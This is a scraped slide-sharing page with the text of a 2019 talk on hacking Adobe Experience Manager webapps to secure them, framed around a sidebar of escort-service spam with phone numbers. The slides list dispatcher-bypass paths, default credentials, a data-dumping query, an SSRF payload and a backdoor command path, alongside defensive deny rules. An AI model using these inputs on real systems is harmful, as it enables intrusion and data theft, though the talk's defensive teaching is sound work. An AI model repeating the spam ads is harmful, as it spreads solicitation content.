20101215-fxug-tokyo
20101215-fxug-tokyo20101215-fxug-tokyo
20101215-fxug-tokyoJun Funakura
ย 
The JavaScript Revue: Patterns & Frameworks
The JavaScript Revue: Patterns & FrameworksThe JavaScript Revue: Patterns & Frameworks
The JavaScript Revue: Patterns & FrameworksAdam Roderick
ย 

Similar to Securing AEM webapps by hacking them (20)

Macro malware common techniques - public
Macro malware common techniques - publicMacro malware common techniques - public
Macro malware common techniques - public
ย 
Container: is it safe enough to run you application?
Container: is it safe enough to run you application?Container: is it safe enough to run you application?
Container: is it safe enough to run you application?
ย 
Software Security Basics
Software Security BasicsSoftware Security Basics
Software Security Basics
ย 
Security of Go Modules and Vulnerability Scanning in GoCenter and VS Code
Security of Go Modules and Vulnerability Scanning in GoCenter and VS CodeSecurity of Go Modules and Vulnerability Scanning in GoCenter and VS Code
Security of Go Modules and Vulnerability Scanning in GoCenter and VS Code
ย 
Leveraging the power of SolrCloud and Spark with OpenShift
Leveraging the power of SolrCloud and Spark with OpenShiftLeveraging the power of SolrCloud and Spark with OpenShift
Leveraging the power of SolrCloud and Spark with OpenShift
ย 
Taming botnets
Taming botnetsTaming botnets
Taming botnets
ย 
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisLife Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
ย 
Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)
ย 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)
ย 
Android Nรขng cao-Bร i 9-Debug in Android Application Development
Android Nรขng cao-Bร i 9-Debug in Android Application Development Android Nรขng cao-Bร i 9-Debug in Android Application Development
Android Nรขng cao-Bร i 9-Debug in Android Application Development
ย 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
ย 
Developer in a digital crosshair, 2022 edition - No cON Name
Developer in a digital crosshair, 2022 edition - No cON NameDeveloper in a digital crosshair, 2022 edition - No cON Name
Developer in a digital crosshair, 2022 edition - No cON Name
ย 
Security of Go Modules and Vulnerability Scanning in GoCenter and VSCode
Security of Go Modules and Vulnerability Scanning in GoCenter and VSCodeSecurity of Go Modules and Vulnerability Scanning in GoCenter and VSCode
Security of Go Modules and Vulnerability Scanning in GoCenter and VSCode
ย 
Windows 10 URI persistence technique
Windows 10 URI persistence techniqueWindows 10 URI persistence technique
Windows 10 URI persistence technique
ย 
Android utilities
Android utilitiesAndroid utilities
Android utilities
ย 
Android CTS training
Android CTS trainingAndroid CTS training
Android CTS training
ย 
How to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ DisobeyHow to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ Disobey
ย 
Android Security Internals
Android Security InternalsAndroid Security Internals
Android Security Internals
ย 
20101215-fxug-tokyo
20101215-fxug-tokyo20101215-fxug-tokyo
20101215-fxug-tokyo
ย 
The JavaScript Revue: Patterns & Frameworks
The JavaScript Revue: Patterns & FrameworksThe JavaScript Revue: Patterns & Frameworks
The JavaScript Revue: Patterns & Frameworks
ย 

Recently uploaded

Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Servicegwenoracqe6
ย 
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...singhpriety023
ย 
Dubai Call Girls Milky O525547819 Call Girls Dubai Soft Dating
Dubai Call Girls Milky O525547819 Call Girls Dubai Soft DatingDubai Call Girls Milky O525547819 Call Girls Dubai Soft Dating
Dubai Call Girls Milky O525547819 Call Girls Dubai Soft Datingkojalkojal131
ย 
โ‚น5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] ๐Ÿ”|97111...
โ‚น5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] ๐Ÿ”|97111...โ‚น5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] ๐Ÿ”|97111...
โ‚น5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] ๐Ÿ”|97111...Diya Sharma
ย 
VVIP Pune Call Girls Mohammadwadi WhatSapp Number 8005736733 With Elite Staff...
VVIP Pune Call Girls Mohammadwadi WhatSapp Number 8005736733 With Elite Staff...VVIP Pune Call Girls Mohammadwadi WhatSapp Number 8005736733 With Elite Staff...
VVIP Pune Call Girls Mohammadwadi WhatSapp Number 8005736733 With Elite Staff...SUHANI PANDEY
ย 
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...tanu pandey
ย 
VVVIP Call Girls In Connaught Place โžก๏ธ Delhi โžก๏ธ 9999965857 ๐Ÿš€ No Advance 24HRS...
VVVIP Call Girls In Connaught Place โžก๏ธ Delhi โžก๏ธ 9999965857 ๐Ÿš€ No Advance 24HRS...VVVIP Call Girls In Connaught Place โžก๏ธ Delhi โžก๏ธ 9999965857 ๐Ÿš€ No Advance 24HRS...
VVVIP Call Girls In Connaught Place โžก๏ธ Delhi โžก๏ธ 9999965857 ๐Ÿš€ No Advance 24HRS...Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
ย 
Enjoy NightโšกCall Girls Samalka Delhi >เผ’8448380779 Escort Service
Enjoy NightโšกCall Girls Samalka Delhi >เผ’8448380779 Escort ServiceEnjoy NightโšกCall Girls Samalka Delhi >เผ’8448380779 Escort Service
Enjoy NightโšกCall Girls Samalka Delhi >เผ’8448380779 Escort ServiceDelhi Call girls
ย 
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...tanu pandey
ย 
Call Now โ˜Ž 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now โ˜Ž 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.Call Now โ˜Ž 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now โ˜Ž 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.soniya singh
ย 
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...SUHANI PANDEY
ย 
Busty DesiโšกCall Girls in Vasundhara Ghaziabad >เผ’8448380779 Escort Service
Busty DesiโšกCall Girls in Vasundhara Ghaziabad >เผ’8448380779 Escort ServiceBusty DesiโšกCall Girls in Vasundhara Ghaziabad >เผ’8448380779 Escort Service
Busty DesiโšกCall Girls in Vasundhara Ghaziabad >เผ’8448380779 Escort ServiceDelhi Call girls
ย 
Wagholi & High Class Call Girls Pune Neha 8005736733 | 100% Gennuine High Cla...
Wagholi & High Class Call Girls Pune Neha 8005736733 | 100% Gennuine High Cla...Wagholi & High Class Call Girls Pune Neha 8005736733 | 100% Gennuine High Cla...
Wagholi & High Class Call Girls Pune Neha 8005736733 | 100% Gennuine High Cla...SUHANI PANDEY
ย 
Al Barsha Night Partner +0567686026 Call Girls Dubai
Al Barsha Night Partner +0567686026 Call Girls DubaiAl Barsha Night Partner +0567686026 Call Girls Dubai
Al Barsha Night Partner +0567686026 Call Girls DubaiEscorts Call Girls
ย 
Call Girls Sangvi Call Me 7737669865 Budget Friendly No Advance BookingCall G...
Call Girls Sangvi Call Me 7737669865 Budget Friendly No Advance BookingCall G...Call Girls Sangvi Call Me 7737669865 Budget Friendly No Advance BookingCall G...
Call Girls Sangvi Call Me 7737669865 Budget Friendly No Advance BookingCall G...roncy bisnoi
ย 
All Time Service Available Call Girls Mg Road ๐Ÿ‘Œ โญ๏ธ 6378878445
All Time Service Available Call Girls Mg Road ๐Ÿ‘Œ โญ๏ธ 6378878445All Time Service Available Call Girls Mg Road ๐Ÿ‘Œ โญ๏ธ 6378878445
All Time Service Available Call Girls Mg Road ๐Ÿ‘Œ โญ๏ธ 6378878445ruhi
ย 
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...SUHANI PANDEY
ย 
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...tanu pandey
ย 

Recently uploaded (20)

Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
ย 
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...
ย 
Dubai Call Girls Milky O525547819 Call Girls Dubai Soft Dating
Dubai Call Girls Milky O525547819 Call Girls Dubai Soft DatingDubai Call Girls Milky O525547819 Call Girls Dubai Soft Dating
Dubai Call Girls Milky O525547819 Call Girls Dubai Soft Dating
ย 
โ‚น5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] ๐Ÿ”|97111...
โ‚น5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] ๐Ÿ”|97111...โ‚น5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] ๐Ÿ”|97111...
โ‚น5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] ๐Ÿ”|97111...
ย 
VVIP Pune Call Girls Mohammadwadi WhatSapp Number 8005736733 With Elite Staff...
VVIP Pune Call Girls Mohammadwadi WhatSapp Number 8005736733 With Elite Staff...VVIP Pune Call Girls Mohammadwadi WhatSapp Number 8005736733 With Elite Staff...
VVIP Pune Call Girls Mohammadwadi WhatSapp Number 8005736733 With Elite Staff...
ย 
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
ย 
VVVIP Call Girls In Connaught Place โžก๏ธ Delhi โžก๏ธ 9999965857 ๐Ÿš€ No Advance 24HRS...
VVVIP Call Girls In Connaught Place โžก๏ธ Delhi โžก๏ธ 9999965857 ๐Ÿš€ No Advance 24HRS...VVVIP Call Girls In Connaught Place โžก๏ธ Delhi โžก๏ธ 9999965857 ๐Ÿš€ No Advance 24HRS...
VVVIP Call Girls In Connaught Place โžก๏ธ Delhi โžก๏ธ 9999965857 ๐Ÿš€ No Advance 24HRS...
ย 
Enjoy NightโšกCall Girls Samalka Delhi >เผ’8448380779 Escort Service
Enjoy NightโšกCall Girls Samalka Delhi >เผ’8448380779 Escort ServiceEnjoy NightโšกCall Girls Samalka Delhi >เผ’8448380779 Escort Service
Enjoy NightโšกCall Girls Samalka Delhi >เผ’8448380779 Escort Service
ย 
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
ย 
Call Now โ˜Ž 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now โ˜Ž 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.Call Now โ˜Ž 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now โ˜Ž 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
ย 
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
ย 
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
ย 
Busty DesiโšกCall Girls in Vasundhara Ghaziabad >เผ’8448380779 Escort Service
Busty DesiโšกCall Girls in Vasundhara Ghaziabad >เผ’8448380779 Escort ServiceBusty DesiโšกCall Girls in Vasundhara Ghaziabad >เผ’8448380779 Escort Service
Busty DesiโšกCall Girls in Vasundhara Ghaziabad >เผ’8448380779 Escort Service
ย 
Wagholi & High Class Call Girls Pune Neha 8005736733 | 100% Gennuine High Cla...
Wagholi & High Class Call Girls Pune Neha 8005736733 | 100% Gennuine High Cla...Wagholi & High Class Call Girls Pune Neha 8005736733 | 100% Gennuine High Cla...
Wagholi & High Class Call Girls Pune Neha 8005736733 | 100% Gennuine High Cla...
ย 
Al Barsha Night Partner +0567686026 Call Girls Dubai
Al Barsha Night Partner +0567686026 Call Girls DubaiAl Barsha Night Partner +0567686026 Call Girls Dubai
Al Barsha Night Partner +0567686026 Call Girls Dubai
ย 
Call Girls Sangvi Call Me 7737669865 Budget Friendly No Advance BookingCall G...
Call Girls Sangvi Call Me 7737669865 Budget Friendly No Advance BookingCall G...Call Girls Sangvi Call Me 7737669865 Budget Friendly No Advance BookingCall G...
Call Girls Sangvi Call Me 7737669865 Budget Friendly No Advance BookingCall G...
ย 
All Time Service Available Call Girls Mg Road ๐Ÿ‘Œ โญ๏ธ 6378878445
All Time Service Available Call Girls Mg Road ๐Ÿ‘Œ โญ๏ธ 6378878445All Time Service Available Call Girls Mg Road ๐Ÿ‘Œ โญ๏ธ 6378878445
All Time Service Available Call Girls Mg Road ๐Ÿ‘Œ โญ๏ธ 6378878445
ย 
Low Sexy Call Girls In Mohali 9053900678 ๐ŸฅตHave Save And Good Place ๐Ÿฅต
Low Sexy Call Girls In Mohali 9053900678 ๐ŸฅตHave Save And Good Place ๐ŸฅตLow Sexy Call Girls In Mohali 9053900678 ๐ŸฅตHave Save And Good Place ๐Ÿฅต
Low Sexy Call Girls In Mohali 9053900678 ๐ŸฅตHave Save And Good Place ๐Ÿฅต
ย 
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
ย 
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
ย 

Securing AEM webapps by hacking them

  • 1. APACHE SLING & FRIENDS TECH MEETUP 2 - 4 SEPTEMBER 2019 Securing AEM webapps by hacking them Mikhail Egorov @0ang3el, Security researcher & Bug hunter.
  • 3. whoami 3 ๏‚ง Security researcher & full-time bug hunter ๏‚ง https://bugcrowd.com/0ang3el ๏‚ง https://hackerone.com/0ang3el ๏‚ง Conference speaker ๏‚ง https://www.slideshare.net/0ang3el ๏‚ง https://speakerdeck.com/0ang3el
  • 4. AEM & Bug Bounties 4
  • 5. My research on AEM security 5 PHDays 2015 Hacktivity 2018 LevelUp 2019 https://www.slideshare.net/0ang3el
  • 6. Fellow hackers 6 @darkarnium, 2016 @fransrosen, 2018 @JonathanBoumanium, 2018 https://medium.com/@jonathanbouman/reflected-xss-at-philips-com-e48bf8f9cd3c https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
  • 7. Common AEM deployment 7 Interacts with Publish server via AEM Dispatcher! 4503/tcp 4502/tcp 443/tcp ? Main blocks: โ€ข Author AEM instance โ€ข Publish AEM instance โ€ข AEM dispatcher (~WAF)
  • 8. Sources of vulnerabilities 8 ๏‚ง AEM misconfiguration ๏‚ง AEM code (CVEs) ๏‚ง 3rd-party plugins ๏‚ง Your code
  • 9. 9 Vulnerabilities due to misconfiguration
  • 10. AEM dispatcher bypass โ€“ CVE-2016-0957 10 ๏‚ง Blocked by Dispatcher ๏‚ง /bin/querybuilder.json ๏‚ง However passed to publish instance ๏‚ง /bin/querybuilder.json/a.css ๏‚ง /bin/querybuilder.json/a.icoS ๏‚ง /bin/querybuilder.json?a.html ๏‚ง /bin/querybuilder.json;%0aa.css
  • 11. AEM dispatcher bypass โ€“ Sling โ€œfeaturesโ€ 11 ๏‚ง When Sling Servlet is registered with sling.servlet.path other properties are ignored (e.g. sling.servlet.extensions) ๏‚ง Bypassing extension check ๏‚ง /bin/querybuilder.json.css ๏‚ง /bin/querybuilder.feed.ico
  • 12. AEM dispatcher bypass โ€“ Sling โ€œfeaturesโ€ 12 ๏‚ง When Sling Servlet is registered with sling.servlet.resourceTypes ๏‚ง Bypassing path check ๏‚ง Create node with proper sling:resourceType under /content/usergenerated/etc/commerce/smartlists
  • 13. AEM dispatcher security tips 13 ๏‚ง Donโ€™t use rules like ๏‚ง /0041 { /type "allow" /url "*.css" } # This is bad ๏‚ง Better use ๏‚ง /0041 { /type "allow" /extension 'css' }
  • 14. AEM dispatcher security tips 14 ๏‚ง Explicit deny rule for dangerous endpoints ๏‚ง /0090 { /type "deny" /path "/libs/*" } ๏‚ง /0091 { /type "deny" /path "/bin/querybuilder*" } ๏‚ง Place explicit deny rules in the end of policy
  • 15. Default credentials 15 ๏‚ง admin/admin ๏‚ง author/author ๏‚ง Geometrixx users ๏‚ง grios:password ๏‚ง jdoe@geometrixx.info:jdoe ๏‚ง โ€ฆ
  • 17. Weak passwords / Credentials bruterorcing 17 ๏‚ง Properties jcr:createdBy, cq:lastModifiedBy, jcr:lastModifiedBy contain usernames ๏‚ง Many ways to bruteforce ๏‚ง LoginStatusServlet ๏‚ง GetLoggedInUser servlet ๏‚ง CurrentUserServlet ๏‚ง โ€ฆ
  • 18. Weak permissions for JCR 18 ๏‚ง Many ways to access JCR ๏‚ง DefaultGetServlet ๏‚ง QueryBuilderJsonServlet ๏‚ง QueryBuilderFeedServlet ๏‚ง GQLSearchServlet ๏‚ง CRXDE Lite ๏‚ง โ€ฆ
  • 19. Weak permissions for JCR 19 ๏‚ง Anonymous user has jcr:write permission for /content/usergenerated/etc/commerce/s martlists
  • 21. Weak permissions for JCR 21 type=nt:file&nodename=*.zip
  • 22. Weak permissions for JCR 22 path=/home&p.hits=full&p.limit=-1
  • 23. 23 Vulnerabilities due to 3-rd party components
  • 24. Groovy Console 24 ๏‚ง Exposes servlet at /bin/groovyconsole/post.servlet without authentication by default https://github.com/icfnext/aem-groovy-console
  • 26. ACS AEM Tools 26 ๏‚ง Exposes Fiddle with ability to execute JSP scripts on /etc/acs-tools/aem- fiddle/_jcr_content.run.html ๏‚ง May not require authentication
  • 29. CVE-2018-12809 (SSRF*) 29 ๏‚ง ReportingServicesProxyServlet (cq-content-insight bundle) @SlingServlet( generateComponent = true, metatype = true, resourceTypes = {"cq/contentinsight/proxy"}, extensions = {"json"}, selectors = {"reportingservices"}, methods = {"GET"}, label = "Reporting Services API proxy servlet", description = "Proxy servlet for Reporting Services API" ) public class ReportingServicesProxyServlet extends SlingSafeMethodsServlet { private static final String DEFAULT_API_OMNITURE_URL = ".*/api[0-9]*.omniture.com/.*";} โ€ฆ } *SSRF - Server Side Request Forgery
  • 30. CVE-2018-12809 (SSRF*) 30 ๏‚ง Paths to invoke servlet ๏‚ง /libs/cq/contentinsight/content/proxy.reportingservices.json ๏‚ง /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet ๏‚ง Vulnerable parameter url ๏‚ง url=http://anyurl%23/api1.omniture.com/a *SSRF - Server Side Request Forgery
  • 31.
  • 32.
  • 33.
  • 34. ExternalJobPostServlet deser / CVE? 34 ๏‚ง Affects AEM 5.5 / AEM 5.6 @Service @Properties(value = { @Property(name = "sling.servlet.extensions", value = "json"), @Property(name = "sling.servlet.paths", value = "/libs/dam/cloud/proxy"), @Property(name = "sling.servlet.methods", value = { "POST", "GET", "HEAD" }) }) public class ExternalJobPostServlet extends SlingAllMethodsServlet { ... }
  • 35. ExternalJobPostServlet deser / CVE? 35 ๏‚ง Parameter file accepts Java serialized stream and passes to OIS.readObject() ๏‚ง Hard to exploit in OSGI environment
  • 36.
  • 37.
  • 39. AEM RCE bundle 39 ๏‚ง Allows to get RCE* when having access to Felix Console ๏‚ง https://github.com/0ang3el/aem-rce-bundle.git * RCE โ€“ Remote Code Execution
  • 40. AEM RCE bundle 40 ๏‚ง Path - /bin/backdoor.html?cmd=ifconfig
  • 41. AEM Hacker 41 ๏‚ง Scripts to check security of AEM application ๏‚ง aem_hacker.py, aem_discoverer.py, aem_enum.py, aem_ssrf2rce.py, aem_server.py, response.bin, aem-rce-sling-script.sh ๏‚ง https://github.com/0ang3el/aem-hacker.git
  • 44. Takeaways 44 ๏‚ง Vulnerabilities can occur on different levels ๏‚ง Install security updates ๏‚ง Defense in depth ๏‚ง Check security of AEM application ๏‚ง Pentest / Bug bounty